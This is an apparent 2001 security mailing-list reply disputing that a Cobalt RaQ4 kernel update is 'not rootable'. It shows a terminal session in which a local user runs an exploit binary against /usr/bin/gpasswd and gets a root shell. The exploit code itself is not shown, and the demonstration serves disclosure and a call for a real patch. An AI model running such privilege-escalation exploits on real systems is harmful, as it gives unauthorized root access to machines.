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Re: [cobalt-security] RaQ4-All-Kernel-1.0.1-2.216C24III.pkg

On Thu, Apr 26, 2001 at 11:05:21AM -0700, shimi wrote:
> If you'll read what's posted in the download page, they said  the bugs of
> the ptrace() and sysctl() functions have been fixed there.  If Cobalt
> keeps their former way of deploying Linux, they manually twaeak the kernel
> to fit to what they need... so... it's not rootable.

If its not rootable, may I have a shell on your box then?

small example (again)

<dennis@dedicated:dennis> uname -r
<dennis@dedicated:dennis> id
uid=180(dennis) gid=100(users) groups=100(users),10(wheel),111(site-adm),112(site1)
<dennis@dedicated:dennis> ./epcs /usr/bin/gpasswd 
bug exploited successfully.
bash# id
uid=0(root) gid=0(root) groups=100(users),10(wheel),111(site-adm),112(site1)
bash# cat /proc/cpuinfo | grep system     
system type     : RaQ3/4

HTH HAND and give us a real kernel upgrade / patch!

Met vriendelijke groeten,

Dennis Koster
Linux Systeem Beheerder
VuurWerk Internet         
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